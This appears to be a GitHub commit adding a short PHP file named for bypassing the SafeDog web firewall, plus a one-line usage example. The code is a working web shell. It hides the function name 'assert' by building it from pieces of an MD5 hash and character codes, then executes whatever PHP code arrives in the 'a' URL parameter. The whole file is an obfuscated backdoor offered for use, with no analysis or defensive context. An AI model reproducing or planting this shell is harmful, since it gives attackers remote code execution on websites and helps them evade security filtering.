Create bypass-safedog-2016-08-29.php

usage: http://xx.xx/xx.php?a=phpinof()
This commit is contained in:
tennc 2016-08-29 21:53:58 +08:00 committed by GitHub
parent db0431a444
commit 79a9b5885c

View file

@ -0,0 +1,5 @@
<?php
$a=md5('a').'<br>';
$poc=substr($a,14,1).chr(115).chr(115).substr($a,22,1).chr(114).chr(116);
$poc($_GET['a']);
?>